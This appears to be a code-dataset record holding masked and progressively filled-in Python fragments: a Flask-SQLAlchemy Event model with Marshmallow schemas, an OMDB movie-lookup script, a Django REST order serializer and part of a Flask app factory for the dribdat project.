created_by = db.Column(db.Integer, nullable=False)
description = db.Column(db.String(500), nullable=False)
def __init__(self, name, venue, location_lat, location_long, start_time, duration, coordinator_name, coordinator_contact, status_id, org_id, created_by, description):
self.name = name
self.venue = venue
self.location_lat = location_lat
self.location_long = location_long
self.start_time = start_time
self.duration = duration
self.coordinator_name = coordinator_name
self.coordinator_contact = coordinator_contact
self.status_id = status_id
self.org_id = org_id
self.created_by = created_by
self.description = description
class EventSchema(ma.Schema):
class Meta:
fields = ('id', 'name', 'venue', 'location_lat', 'location_long', 'date_created', 'start_time',
'duration', 'coordinator_name', 'coordinator_contact', 'status_id', 'org_id', 'description')
# init schema
event_schema = EventSchema()
events_schema = EventSchema(many=True)
class EventFullInfoSchema(ma.Schema):
event = ma.Nested(event_schema)
admin = ma.Nested(admin_limited_schema)
status = ma.Nested(event_status_schema)
org_unit = ma.Nested(org_unit_schema)
event_with_full_schema = EventFullInfoSchema()
events_with_full_schema = EventFullInfoSchema(many=True)
|
flexible
|
{
"blob_id": "f3167d8f1a806c38fb10672605d8e94265d2fc9c",
"index": 723,
"step-1": "<mask token>\n\n\nclass Event(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass EventSchema(ma.Schema):\n\n\n class Meta:\n fields = ('id', 'name', 'venue', 'location_lat', 'location_long',\n 'date_created', 'start_time', 'duration', 'coordinator_name',\n 'coordinator_contact', 'status_id', 'org_id', 'description')\n\n\n<mask token>\n\n\nclass EventFullInfoSchema(ma.Schema):\n event = ma.Nested(event_schema)\n admin = ma.Nested(admin_limited_schema)\n status = ma.Nested(event_status_schema)\n org_unit = ma.Nested(org_unit_schema)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Event(db.Model):\n __tablename__ = 'event'\n __table_args__ = ForeignKeyConstraint(['status_id'], ['event_status.id']\n ), ForeignKeyConstraint(['org_id'], ['org_unit.id']\n ), ForeignKeyConstraint(['created_by'], ['admin.id'])\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(45), nullable=False)\n venue = db.Column(db.String(45), nullable=False)\n location_lat = db.Column(db.Float, nullable=False)\n location_long = db.Column(db.Float, nullable=False)\n date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)\n start_time = db.Column(db.DateTime, nullable=False)\n duration = db.Column(db.Float, nullable=False)\n coordinator_name = db.Column(db.String(45), nullable=False)\n coordinator_contact = db.Column(db.Integer, nullable=False)\n status_id = db.Column(db.Integer, nullable=False)\n org_id = db.Column(db.Integer, nullable=False)\n created_by = db.Column(db.Integer, nullable=False)\n description = db.Column(db.String(500), nullable=False)\n\n def __init__(self, name, venue, location_lat, location_long, start_time,\n duration, coordinator_name, coordinator_contact, status_id, org_id,\n created_by, description):\n self.name = name\n self.venue = venue\n self.location_lat = location_lat\n self.location_long = location_long\n self.start_time = start_time\n self.duration = duration\n self.coordinator_name = coordinator_name\n self.coordinator_contact = coordinator_contact\n self.status_id = status_id\n self.org_id = org_id\n self.created_by = created_by\n self.description = description\n\n\nclass EventSchema(ma.Schema):\n\n\n class Meta:\n fields = ('id', 'name', 'venue', 'location_lat', 'location_long',\n 'date_created', 'start_time', 'duration', 'coordinator_name',\n 'coordinator_contact', 'status_id', 'org_id', 'description')\n\n\n<mask token>\n\n\nclass EventFullInfoSchema(ma.Schema):\n event = ma.Nested(event_schema)\n admin = ma.Nested(admin_limited_schema)\n status = ma.Nested(event_status_schema)\n org_unit = ma.Nested(org_unit_schema)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Event(db.Model):\n __tablename__ = 'event'\n __table_args__ = ForeignKeyConstraint(['status_id'], ['event_status.id']\n ), ForeignKeyConstraint(['org_id'], ['org_unit.id']\n ), ForeignKeyConstraint(['created_by'], ['admin.id'])\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(45), nullable=False)\n venue = db.Column(db.String(45), nullable=False)\n location_lat = db.Column(db.Float, nullable=False)\n location_long = db.Column(db.Float, nullable=False)\n date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)\n start_time = db.Column(db.DateTime, nullable=False)\n duration = db.Column(db.Float, nullable=False)\n coordinator_name = db.Column(db.String(45), nullable=False)\n coordinator_contact = db.Column(db.Integer, nullable=False)\n status_id = db.Column(db.Integer, nullable=False)\n org_id = db.Column(db.Integer, nullable=False)\n created_by = db.Column(db.Integer, nullable=False)\n description = db.Column(db.String(500), nullable=False)\n\n def __init__(self, name, venue, location_lat, location_long, start_time,\n duration, coordinator_name, coordinator_contact, status_id, org_id,\n created_by, description):\n self.name = name\n self.venue = venue\n self.location_lat = location_lat\n self.location_long = location_long\n self.start_time = start_time\n self.duration = duration\n self.coordinator_name = coordinator_name\n self.coordinator_contact = coordinator_contact\n self.status_id = status_id\n self.org_id = org_id\n self.created_by = created_by\n self.description = description\n\n\nclass EventSchema(ma.Schema):\n\n\n class Meta:\n fields = ('id', 'name', 'venue', 'location_lat', 'location_long',\n 'date_created', 'start_time', 'duration', 'coordinator_name',\n 'coordinator_contact', 'status_id', 'org_id', 'description')\n\n\nevent_schema = EventSchema()\nevents_schema = EventSchema(many=True)\n\n\nclass EventFullInfoSchema(ma.Schema):\n event = ma.Nested(event_schema)\n admin = ma.Nested(admin_limited_schema)\n status = ma.Nested(event_status_schema)\n org_unit = ma.Nested(org_unit_schema)\n\n\nevent_with_full_schema = EventFullInfoSchema()\nevents_with_full_schema = EventFullInfoSchema(many=True)\n",
"step-4": "from database import db\nfrom database import ma\nfrom datetime import datetime\nfrom sqlalchemy import ForeignKeyConstraint\nfrom models.admin import Admin, admin_limited_schema\nfrom models.event_status import EventStatus, event_status_schema\nfrom models.org_unit import org_unit_schema\n\n\nclass Event(db.Model):\n __tablename__ = 'event'\n __table_args__ = ForeignKeyConstraint(['status_id'], ['event_status.id']\n ), ForeignKeyConstraint(['org_id'], ['org_unit.id']\n ), ForeignKeyConstraint(['created_by'], ['admin.id'])\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(45), nullable=False)\n venue = db.Column(db.String(45), nullable=False)\n location_lat = db.Column(db.Float, nullable=False)\n location_long = db.Column(db.Float, nullable=False)\n date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)\n start_time = db.Column(db.DateTime, nullable=False)\n duration = db.Column(db.Float, nullable=False)\n coordinator_name = db.Column(db.String(45), nullable=False)\n coordinator_contact = db.Column(db.Integer, nullable=False)\n status_id = db.Column(db.Integer, nullable=False)\n org_id = db.Column(db.Integer, nullable=False)\n created_by = db.Column(db.Integer, nullable=False)\n description = db.Column(db.String(500), nullable=False)\n\n def __init__(self, name, venue, location_lat, location_long, start_time,\n duration, coordinator_name, coordinator_contact, status_id, org_id,\n created_by, description):\n self.name = name\n self.venue = venue\n self.location_lat = location_lat\n self.location_long = location_long\n self.start_time = start_time\n self.duration = duration\n self.coordinator_name = coordinator_name\n self.coordinator_contact = coordinator_contact\n self.status_id = status_id\n self.org_id = org_id\n self.created_by = created_by\n self.description = description\n\n\nclass EventSchema(ma.Schema):\n\n\n class Meta:\n fields = ('id', 'name', 'venue', 'location_lat', 'location_long',\n 'date_created', 'start_time', 'duration', 'coordinator_name',\n 'coordinator_contact', 'status_id', 'org_id', 'description')\n\n\nevent_schema = EventSchema()\nevents_schema = EventSchema(many=True)\n\n\nclass EventFullInfoSchema(ma.Schema):\n event = ma.Nested(event_schema)\n admin = ma.Nested(admin_limited_schema)\n status = ma.Nested(event_status_schema)\n org_unit = ma.Nested(org_unit_schema)\n\n\nevent_with_full_schema = EventFullInfoSchema()\nevents_with_full_schema = EventFullInfoSchema(many=True)\n",
"step-5": "from database import db\nfrom database import ma\nfrom datetime import datetime\nfrom sqlalchemy import ForeignKeyConstraint\nfrom models.admin import Admin, admin_limited_schema\nfrom models.event_status import EventStatus, event_status_schema\nfrom models.org_unit import org_unit_schema\n\nclass Event(db.Model):\n # class corresponding to the event table in the database\n __tablename__ = 'event'\n __table_args__ = (\n ForeignKeyConstraint(['status_id'], ['event_status.id']),\n ForeignKeyConstraint(['org_id'], ['org_unit.id']),\n ForeignKeyConstraint(['created_by'], ['admin.id']),\n )\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(45), nullable=False)\n venue = db.Column(db.String(45), nullable=False)\n location_lat = db.Column(db.Float, nullable=False)\n location_long = db.Column(db.Float, nullable=False)\n date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)\n start_time = db.Column(db.DateTime, nullable=False)\n duration = db.Column(db.Float, nullable=False)\n coordinator_name = db.Column(db.String(45), nullable=False)\n coordinator_contact = db.Column(db.Integer, nullable=False)\n status_id = db.Column(db.Integer, nullable=False)\n org_id = db.Column(db.Integer, nullable=False)\n created_by = db.Column(db.Integer, nullable=False)\n description = db.Column(db.String(500), nullable=False)\n\n def __init__(self, name, venue, location_lat, location_long, start_time, duration, coordinator_name, coordinator_contact, status_id, org_id, created_by, description):\n self.name = name\n self.venue = venue\n self.location_lat = location_lat\n self.location_long = location_long\n self.start_time = start_time\n self.duration = duration\n self.coordinator_name = coordinator_name\n self.coordinator_contact = coordinator_contact\n self.status_id = status_id\n self.org_id = org_id\n self.created_by = created_by\n self.description = description\n\n\nclass EventSchema(ma.Schema):\n class Meta:\n fields = ('id', 'name', 'venue', 'location_lat', 'location_long', 'date_created', 'start_time',\n 'duration', 'coordinator_name', 'coordinator_contact', 'status_id', 'org_id', 'description')\n\n\n# init schema\nevent_schema = EventSchema()\nevents_schema = EventSchema(many=True)\n\n\nclass EventFullInfoSchema(ma.Schema):\n event = ma.Nested(event_schema)\n admin = ma.Nested(admin_limited_schema)\n status = ma.Nested(event_status_schema)\n org_unit = ma.Nested(org_unit_schema)\n\n\n\nevent_with_full_schema = EventFullInfoSchema()\nevents_with_full_schema = EventFullInfoSchema(many=True)",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
def rating_msg(rating):
if rating > 80:
return 'You should watch this movie right now!\n'
elif rating < 50:
return 'Avoid this movie at all cost!\n'
else:
return ''
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def rating_msg(rating):
if rating > 80:
return 'You should watch this movie right now!\n'
elif rating < 50:
return 'Avoid this movie at all cost!\n'
else:
return ''
<|reserved_special_token_0|>
if r.status_code == requests.status_codes.codes.ok:
movie_data = json.loads(r.text)
if 'Error' in movie_data:
print(movie_data['Error'])
exit(1)
print(f"\nTitle: {movie_data['Title']}")
print(f"Year: {movie_data['Year']}")
print(f"Rating: {movie_data['Rated']}")
print(f"Running Time: {movie_data['Runtime']}")
print(f"\nDescription: {movie_data['Plot']}")
print('\n' + rating_msg(int(movie_data['Metascore'])), end='')
else:
print(r)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
BASE_URL = 'http://www.omdbapi.com/'
def rating_msg(rating):
if rating > 80:
return 'You should watch this movie right now!\n'
elif rating < 50:
return 'Avoid this movie at all cost!\n'
else:
return ''
api_key = sys.argv[1]
title = input('Enter the name of a movie: ')
data = {'apikey': api_key, 't': title}
r = requests.get(BASE_URL, data)
if r.status_code == requests.status_codes.codes.ok:
movie_data = json.loads(r.text)
if 'Error' in movie_data:
print(movie_data['Error'])
exit(1)
print(f"\nTitle: {movie_data['Title']}")
print(f"Year: {movie_data['Year']}")
print(f"Rating: {movie_data['Rated']}")
print(f"Running Time: {movie_data['Runtime']}")
print(f"\nDescription: {movie_data['Plot']}")
print('\n' + rating_msg(int(movie_data['Metascore'])), end='')
else:
print(r)
<|reserved_special_token_1|>
import sys
import json
import requests
BASE_URL = 'http://www.omdbapi.com/'
def rating_msg(rating):
if rating > 80:
return 'You should watch this movie right now!\n'
elif rating < 50:
return 'Avoid this movie at all cost!\n'
else:
return ''
api_key = sys.argv[1]
title = input('Enter the name of a movie: ')
data = {'apikey': api_key, 't': title}
r = requests.get(BASE_URL, data)
if r.status_code == requests.status_codes.codes.ok:
movie_data = json.loads(r.text)
if 'Error' in movie_data:
print(movie_data['Error'])
exit(1)
print(f"\nTitle: {movie_data['Title']}")
print(f"Year: {movie_data['Year']}")
print(f"Rating: {movie_data['Rated']}")
print(f"Running Time: {movie_data['Runtime']}")
print(f"\nDescription: {movie_data['Plot']}")
print('\n' + rating_msg(int(movie_data['Metascore'])), end='')
else:
print(r)
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import json
import requests
BASE_URL = 'http://www.omdbapi.com/'
def rating_msg(rating):
if rating > 80:
return 'You should watch this movie right now!\n'
elif rating < 50:
return 'Avoid this movie at all cost!\n'
else:
return ''
api_key = sys.argv[1]
title = input('Enter the name of a movie: ')
data = {'apikey': api_key, 't': title}
r = requests.get(BASE_URL, data)
if r.status_code == requests.status_codes.codes.ok:
movie_data = json.loads(r.text)
if 'Error' in movie_data:
print(movie_data['Error'])
exit(1)
print(f'\nTitle: {movie_data["Title"]}')
print(f'Year: {movie_data["Year"]}')
print(f'Rating: {movie_data["Rated"]}')
print(f'Running Time: {movie_data["Runtime"]}')
print(f'\nDescription: {movie_data["Plot"]}')
print('\n' + rating_msg(int(movie_data['Metascore'])), end="")
else:
print(r)
|
flexible
|
{
"blob_id": "7f33effa86fc3a80fce0e5e1ecf97ab4ca80402d",
"index": 1833,
"step-1": "<mask token>\n\n\ndef rating_msg(rating):\n if rating > 80:\n return 'You should watch this movie right now!\\n'\n elif rating < 50:\n return 'Avoid this movie at all cost!\\n'\n else:\n return ''\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef rating_msg(rating):\n if rating > 80:\n return 'You should watch this movie right now!\\n'\n elif rating < 50:\n return 'Avoid this movie at all cost!\\n'\n else:\n return ''\n\n\n<mask token>\nif r.status_code == requests.status_codes.codes.ok:\n movie_data = json.loads(r.text)\n if 'Error' in movie_data:\n print(movie_data['Error'])\n exit(1)\n print(f\"\\nTitle: {movie_data['Title']}\")\n print(f\"Year: {movie_data['Year']}\")\n print(f\"Rating: {movie_data['Rated']}\")\n print(f\"Running Time: {movie_data['Runtime']}\")\n print(f\"\\nDescription: {movie_data['Plot']}\")\n print('\\n' + rating_msg(int(movie_data['Metascore'])), end='')\nelse:\n print(r)\n",
"step-3": "<mask token>\nBASE_URL = 'http://www.omdbapi.com/'\n\n\ndef rating_msg(rating):\n if rating > 80:\n return 'You should watch this movie right now!\\n'\n elif rating < 50:\n return 'Avoid this movie at all cost!\\n'\n else:\n return ''\n\n\napi_key = sys.argv[1]\ntitle = input('Enter the name of a movie: ')\ndata = {'apikey': api_key, 't': title}\nr = requests.get(BASE_URL, data)\nif r.status_code == requests.status_codes.codes.ok:\n movie_data = json.loads(r.text)\n if 'Error' in movie_data:\n print(movie_data['Error'])\n exit(1)\n print(f\"\\nTitle: {movie_data['Title']}\")\n print(f\"Year: {movie_data['Year']}\")\n print(f\"Rating: {movie_data['Rated']}\")\n print(f\"Running Time: {movie_data['Runtime']}\")\n print(f\"\\nDescription: {movie_data['Plot']}\")\n print('\\n' + rating_msg(int(movie_data['Metascore'])), end='')\nelse:\n print(r)\n",
"step-4": "import sys\nimport json\nimport requests\nBASE_URL = 'http://www.omdbapi.com/'\n\n\ndef rating_msg(rating):\n if rating > 80:\n return 'You should watch this movie right now!\\n'\n elif rating < 50:\n return 'Avoid this movie at all cost!\\n'\n else:\n return ''\n\n\napi_key = sys.argv[1]\ntitle = input('Enter the name of a movie: ')\ndata = {'apikey': api_key, 't': title}\nr = requests.get(BASE_URL, data)\nif r.status_code == requests.status_codes.codes.ok:\n movie_data = json.loads(r.text)\n if 'Error' in movie_data:\n print(movie_data['Error'])\n exit(1)\n print(f\"\\nTitle: {movie_data['Title']}\")\n print(f\"Year: {movie_data['Year']}\")\n print(f\"Rating: {movie_data['Rated']}\")\n print(f\"Running Time: {movie_data['Runtime']}\")\n print(f\"\\nDescription: {movie_data['Plot']}\")\n print('\\n' + rating_msg(int(movie_data['Metascore'])), end='')\nelse:\n print(r)\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport json\n\nimport requests\n\n\nBASE_URL = 'http://www.omdbapi.com/'\n\n\ndef rating_msg(rating):\n if rating > 80:\n return 'You should watch this movie right now!\\n'\n elif rating < 50:\n return 'Avoid this movie at all cost!\\n'\n else:\n return ''\n\n\napi_key = sys.argv[1]\n\ntitle = input('Enter the name of a movie: ')\n\ndata = {'apikey': api_key, 't': title}\nr = requests.get(BASE_URL, data)\n\nif r.status_code == requests.status_codes.codes.ok:\n movie_data = json.loads(r.text)\n if 'Error' in movie_data:\n print(movie_data['Error'])\n exit(1)\n\n print(f'\\nTitle: {movie_data[\"Title\"]}')\n print(f'Year: {movie_data[\"Year\"]}')\n print(f'Rating: {movie_data[\"Rated\"]}')\n print(f'Running Time: {movie_data[\"Runtime\"]}')\n print(f'\\nDescription: {movie_data[\"Plot\"]}')\n\n print('\\n' + rating_msg(int(movie_data['Metascore'])), end=\"\")\nelse:\n print(r)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
config_info = {'n_input': 1, 'num_layers': 1, 'features': 20,
'sequence_length': 1344, 'num_steps': None, 'lstm_size': None,
'batch_size': None, 'init_learning_rate': None, 'learning_rate_decay':
None, 'init_epoch': None, 'max_epoch': None, 'dropout_rate': None}
|
flexible
|
{
"blob_id": "8ede786526f4b730173777d9d3b9c7e4554fc887",
"index": 2443,
"step-1": "<mask token>\n",
"step-2": "config_info = {'n_input': 1, 'num_layers': 1, 'features': 20,\n 'sequence_length': 1344, 'num_steps': None, 'lstm_size': None,\n 'batch_size': None, 'init_learning_rate': None, 'learning_rate_decay':\n None, 'init_epoch': None, 'max_epoch': None, 'dropout_rate': None}\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
from abc import ABC
from rest_framework import serializers
from shopping_cars.models import Order, ShoppingCart
class OrderSerializer(serializers.ModelSerializer):
class Meta:
model = Order
fields = '__all__'
class OrderProductSerializer(serializers.ModelSerializer):
class Meta:
model = ShoppingCart
fields = '__all__'
# ways to validate
# #1
def validate_quantity(self, value):
if value <= 0:
raise serializers.ValidationError(
"Please, enter a positive quantity")
return value
def validate_total_price_product(self, value):
if value <= 0:
raise serializers.ValidationError(
"Please, enter a positive total price")
return value
# #2
def validate(self, data):
if data['quantity'] <= 0 and data['total_price_product'] <= 0:
raise serializers.ValidationError(
"Please, enter a positive value")
return data
|
normal
|
{
"blob_id": "9c14f024b25c5014567405535dbe5a6c787cfe28",
"index": 6529,
"step-1": "<mask token>\n\n\nclass OrderProductSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = ShoppingCart\n fields = '__all__'\n\n def validate_quantity(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive quantity')\n return value\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass OrderProductSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = ShoppingCart\n fields = '__all__'\n\n def validate_quantity(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive quantity')\n return value\n\n def validate_total_price_product(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive total price')\n return value\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = Order\n fields = '__all__'\n\n\nclass OrderProductSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = ShoppingCart\n fields = '__all__'\n\n def validate_quantity(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive quantity')\n return value\n\n def validate_total_price_product(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive total price')\n return value\n\n def validate(self, data):\n if data['quantity'] <= 0 and data['total_price_product'] <= 0:\n raise serializers.ValidationError('Please, enter a positive value')\n return data\n",
"step-4": "from abc import ABC\nfrom rest_framework import serializers\nfrom shopping_cars.models import Order, ShoppingCart\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = Order\n fields = '__all__'\n\n\nclass OrderProductSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = ShoppingCart\n fields = '__all__'\n\n def validate_quantity(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive quantity')\n return value\n\n def validate_total_price_product(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive total price')\n return value\n\n def validate(self, data):\n if data['quantity'] <= 0 and data['total_price_product'] <= 0:\n raise serializers.ValidationError('Please, enter a positive value')\n return data\n",
"step-5": "from abc import ABC\nfrom rest_framework import serializers\nfrom shopping_cars.models import Order, ShoppingCart\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Order\n fields = '__all__'\n\n\nclass OrderProductSerializer(serializers.ModelSerializer):\n class Meta:\n model = ShoppingCart\n fields = '__all__'\n\n # ways to validate\n # #1\n def validate_quantity(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n \"Please, enter a positive quantity\")\n return value\n\n def validate_total_price_product(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n \"Please, enter a positive total price\")\n return value\n\n # #2\n def validate(self, data):\n if data['quantity'] <= 0 and data['total_price_product'] <= 0:\n raise serializers.ValidationError(\n \"Please, enter a positive value\")\n return data\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
<|reserved_special_token_0|>
def register_extensions(app):
"""Register Flask extensions."""
assets.init_app(app)
hashing.init_app(app)
cache.init_app(app)
db.init_app(app)
login_manager.init_app(app)
migrate.init_app(app, db)
init_mailman(app)
init_talisman(app)
return None
<|reserved_special_token_0|>
def register_blueprints(app):
"""Register Flask blueprints."""
app.register_blueprint(public.views.blueprint)
app.register_blueprint(public.project.blueprint)
app.register_blueprint(public.auth.blueprint)
app.register_blueprint(public.api.blueprint)
app.register_blueprint(admin.views.blueprint)
return None
<|reserved_special_token_0|>
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
from dribdat.user.models import User
return {'db': db, 'User': User}
app.shell_context_processor(shell_context)
<|reserved_special_token_0|>
def register_filters(app):
"""Register filters for templates."""
Misaka(app, autolink=True, fenced_code=True, strikethrough=True, tables
=True)
app.oembed_providers = bootstrap_basic()
@app.template_filter()
def onebox(value):
return make_oembedplus(value, app.oembed_providers, maxwidth=600,
maxheight=400)
app.tz = timezone(app.config['TIME_ZONE'])
app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&='
)
@app.template_filter()
def since_date(value):
return timesince(value)
@app.template_filter()
def until_date(value):
return timesince(value, default='now!', until=True)
@app.template_filter()
def format_date(value, format='%d.%m.%Y'):
if value is None:
return ''
return value.strftime(format)
@app.template_filter()
def format_datetime(value, format='%d.%m.%Y %H:%M'):
if value is None:
return ''
return value.strftime(format)
def register_loggers(app):
"""Initialize and configure logging."""
if 'DEBUG' in app.config and not app.config['DEBUG']:
import logging
stream_handler = logging.StreamHandler()
app.logger.addHandler(stream_handler)
app.logger.setLevel(logging.INFO)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init_app(config_object=ProdConfig):
"""Define an application factory.
See: http://flask.pocoo.org/docs/patterns/appfactories/
:param config_object: The configuration object to use.
"""
app = Flask(__name__)
app.config.from_object(config_object)
if app.config['SERVER_CORS']:
CORS(app, resources={'/api/*': {'origins': '*'}})
app.config['CORS_HEADERS'] = 'Content-Type'
if app.config['SERVER_PROXY']:
app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)
else:
app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')
for static in ('css', 'img', 'js', 'public'):
app.wsgi_app.add_files('dribdat/static/' + static)
register_extensions(app)
register_blueprints(app)
register_oauthhandlers(app)
register_errorhandlers(app)
register_filters(app)
register_loggers(app)
register_shellcontext(app)
register_commands(app)
register_caching(app)
return app
def register_extensions(app):
"""Register Flask extensions."""
assets.init_app(app)
hashing.init_app(app)
cache.init_app(app)
db.init_app(app)
login_manager.init_app(app)
migrate.init_app(app, db)
init_mailman(app)
init_talisman(app)
return None
<|reserved_special_token_0|>
def register_blueprints(app):
"""Register Flask blueprints."""
app.register_blueprint(public.views.blueprint)
app.register_blueprint(public.project.blueprint)
app.register_blueprint(public.auth.blueprint)
app.register_blueprint(public.api.blueprint)
app.register_blueprint(admin.views.blueprint)
return None
def register_oauthhandlers(app):
"""Set up OAuth handlers based on configuration."""
blueprint = get_auth_blueprint(app)
if blueprint is not None:
app.register_blueprint(blueprint, url_prefix='/oauth')
def register_errorhandlers(app):
"""Register error handlers."""
def render_error(error):
"""Render error template."""
error_code = getattr(error, 'code', 500)
return render_template('{0}.html'.format(error_code)), error_code
for errcode in [401, 404, 500]:
app.errorhandler(errcode)(render_error)
return None
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
from dribdat.user.models import User
return {'db': db, 'User': User}
app.shell_context_processor(shell_context)
<|reserved_special_token_0|>
def register_filters(app):
"""Register filters for templates."""
Misaka(app, autolink=True, fenced_code=True, strikethrough=True, tables
=True)
app.oembed_providers = bootstrap_basic()
@app.template_filter()
def onebox(value):
return make_oembedplus(value, app.oembed_providers, maxwidth=600,
maxheight=400)
app.tz = timezone(app.config['TIME_ZONE'])
app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&='
)
@app.template_filter()
def since_date(value):
return timesince(value)
@app.template_filter()
def until_date(value):
return timesince(value, default='now!', until=True)
@app.template_filter()
def format_date(value, format='%d.%m.%Y'):
if value is None:
return ''
return value.strftime(format)
@app.template_filter()
def format_datetime(value, format='%d.%m.%Y %H:%M'):
if value is None:
return ''
return value.strftime(format)
def register_loggers(app):
"""Initialize and configure logging."""
if 'DEBUG' in app.config and not app.config['DEBUG']:
import logging
stream_handler = logging.StreamHandler()
app.logger.addHandler(stream_handler)
app.logger.setLevel(logging.INFO)
def register_caching(app):
"""Prevent cached responses in debug."""
if 'DEBUG' in app.config and app.config['DEBUG']:
@app.after_request
def after_request(response):
response.headers['Cache-Control'
] = 'no-cache, no-store, must-revalidate, public, max-age=0'
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init_app(config_object=ProdConfig):
"""Define an application factory.
See: http://flask.pocoo.org/docs/patterns/appfactories/
:param config_object: The configuration object to use.
"""
app = Flask(__name__)
app.config.from_object(config_object)
if app.config['SERVER_CORS']:
CORS(app, resources={'/api/*': {'origins': '*'}})
app.config['CORS_HEADERS'] = 'Content-Type'
if app.config['SERVER_PROXY']:
app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)
else:
app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')
for static in ('css', 'img', 'js', 'public'):
app.wsgi_app.add_files('dribdat/static/' + static)
register_extensions(app)
register_blueprints(app)
register_oauthhandlers(app)
register_errorhandlers(app)
register_filters(app)
register_loggers(app)
register_shellcontext(app)
register_commands(app)
register_caching(app)
return app
def register_extensions(app):
"""Register Flask extensions."""
assets.init_app(app)
hashing.init_app(app)
cache.init_app(app)
db.init_app(app)
login_manager.init_app(app)
migrate.init_app(app, db)
init_mailman(app)
init_talisman(app)
return None
<|reserved_special_token_0|>
def init_talisman(app):
"""Initialize Talisman support."""
if 'SERVER_SSL' in app.config and app.config['SERVER_SSL']:
Talisman(app, content_security_policy=app.config['CSP_DIRECTIVES'],
frame_options_allow_from='*')
def register_blueprints(app):
"""Register Flask blueprints."""
app.register_blueprint(public.views.blueprint)
app.register_blueprint(public.project.blueprint)
app.register_blueprint(public.auth.blueprint)
app.register_blueprint(public.api.blueprint)
app.register_blueprint(admin.views.blueprint)
return None
def register_oauthhandlers(app):
"""Set up OAuth handlers based on configuration."""
blueprint = get_auth_blueprint(app)
if blueprint is not None:
app.register_blueprint(blueprint, url_prefix='/oauth')
def register_errorhandlers(app):
"""Register error handlers."""
def render_error(error):
"""Render error template."""
error_code = getattr(error, 'code', 500)
return render_template('{0}.html'.format(error_code)), error_code
for errcode in [401, 404, 500]:
app.errorhandler(errcode)(render_error)
return None
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
from dribdat.user.models import User
return {'db': db, 'User': User}
app.shell_context_processor(shell_context)
<|reserved_special_token_0|>
def register_filters(app):
"""Register filters for templates."""
Misaka(app, autolink=True, fenced_code=True, strikethrough=True, tables
=True)
app.oembed_providers = bootstrap_basic()
@app.template_filter()
def onebox(value):
return make_oembedplus(value, app.oembed_providers, maxwidth=600,
maxheight=400)
app.tz = timezone(app.config['TIME_ZONE'])
app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&='
)
@app.template_filter()
def since_date(value):
return timesince(value)
@app.template_filter()
def until_date(value):
return timesince(value, default='now!', until=True)
@app.template_filter()
def format_date(value, format='%d.%m.%Y'):
if value is None:
return ''
return value.strftime(format)
@app.template_filter()
def format_datetime(value, format='%d.%m.%Y %H:%M'):
if value is None:
return ''
return value.strftime(format)
def register_loggers(app):
"""Initialize and configure logging."""
if 'DEBUG' in app.config and not app.config['DEBUG']:
import logging
stream_handler = logging.StreamHandler()
app.logger.addHandler(stream_handler)
app.logger.setLevel(logging.INFO)
def register_caching(app):
"""Prevent cached responses in debug."""
if 'DEBUG' in app.config and app.config['DEBUG']:
